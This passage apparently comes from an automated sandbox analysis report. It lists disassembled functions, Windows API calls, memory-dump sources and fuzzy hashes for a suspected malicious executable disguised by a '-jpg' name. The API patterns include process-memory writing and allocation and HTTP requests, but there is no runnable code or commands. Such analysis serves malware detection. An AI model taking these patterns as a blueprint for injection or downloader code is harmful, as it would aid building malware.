                                                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                          • DestroyWindow.USER32(?), ref: 00455728
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 1042038666-0
                                                                                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 0041780F
                                                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                          • __getptd.LIBCMT ref: 00417826
                                                                                                          • __amsg_exit.LIBCMT ref: 00417834
                                                                                                          • __lock.LIBCMT ref: 00417844
                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 938513278-0
                                                                                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                          APIs
                                                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 4247068974-0
                                                                                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )$U$\
                                                                                                          • API String ID: 0-3705770531
                                                                                                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                          APIs
                                                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 886957087-24824748
                                                                                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                          • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                          • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                          • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                          • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                          • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                          • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                          • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                          • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                          • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                          Strings
                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                          • API String ID: 708495834-557222456
                                                                                                          • Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                                                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                          • Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                                                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                          APIs
                                                                                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \$]$h
                                                                                                          • API String ID: 4104443479-3262404753
                                                                                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                          APIs
                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                          • String ID: <$@
                                                                                                          • API String ID: 2417854910-1426351568
                                                                                                          • Opcode ID: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                                                                                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                          • Opcode Fuzzy Hash: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                                                                                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                          APIs
                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3705125965-3916222277
                                                                                                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 135850232-4108050209
